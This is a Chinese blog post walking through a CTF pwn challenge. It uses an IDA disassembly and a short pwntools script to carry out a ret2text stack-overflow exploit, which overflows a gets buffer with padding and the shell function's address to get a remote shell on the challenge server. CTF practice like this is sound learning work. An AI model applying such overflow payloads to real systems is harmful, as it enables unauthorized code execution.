谈谈最近学到的简单的东西(五)


阅读数: 次   

攻防世界pwn题:反应釜开关控制(难度:三)

题目比较简单 直接开始
首先下载附件拖入IDA PRO,看到如下界面:

可以看到有三个比较突出的函数,easy、normal和shell
如下是main函数:

如果完全按照题目流程走那就是函数之间的串联(?
但是这里直接看到了gets函数,于是我们将其秒杀
双击shell直接获取其地址

1
2
3
4
5
6
7
8
9
.text:00000000004005F6                               ; =============== S U B R O U T I N E =======================================
.text:00000000004005F6
.text:00000000004005F6                               ; Attributes: bp-based frame
.text:00000000004005F6
.text:00000000004005F6                               ; int shell()
.text:00000000004005F6                               public shell
.text:00000000004005F6                               shell proc near                         ; DATA XREF: normal+4E↓o
.text:00000000004005F6                               ; __unwind {
.text:00000000004005F6 55                            push    rbp

0x4005F6
再利用栈溢出ret2text的基本步骤,将缓冲区填满,溢出至返回地址,并将返回地址写为shell的地址
于是有了如下exp

exp

1
2
3
4
5
6
from pwn import *
sh_addr=0x4005F6
p=remote("61.147.171.105",62675)
payload1 = b'a'*520 + p64(sh_addr)
p.sendline(payload1)
p.interactive()

接着就可以开开心心cat flag

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 本站访客数人次

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Hola!这里是L0tus的博客。零基础的小白用hexo搭起来的博客,还比较简陋,大家勉强看看吧。 本人目前是HDU大一新生,英语专业。 关于我的性格之类的嘛,我是一个极好相处也极好说话的纯粹之人。只要来者怀着纯粹之心,无论是对交友还是对学问技术,我们都能成为好朋友。 平时其实有写日记的习惯,从初一到高三毕业都有在写,不过以后或许就用博客来取代了。 这个博客主要是记录自己的成长过程,技术方面和心理方面。主题比较简约,但十分清晰,阅读起来也没有任何障碍。(也不知道会有多少人来看lol) 偶尔会有用英语写的文章,因为有时候我觉得有些想法用英文表达更加合适。 我的昵称L0tus来源于英文单词"lotus",本意是"莲"。在罗马神话中lotus被称作“忘忧果”,食用后会让人流连忘返,忘却一切苦难。当初是在英国诗人Tennyson的诗选中看到这个单词,一见钟情就拿来当名字了,其实我主要还是觉得这个单词挺美的也挺好听的lol。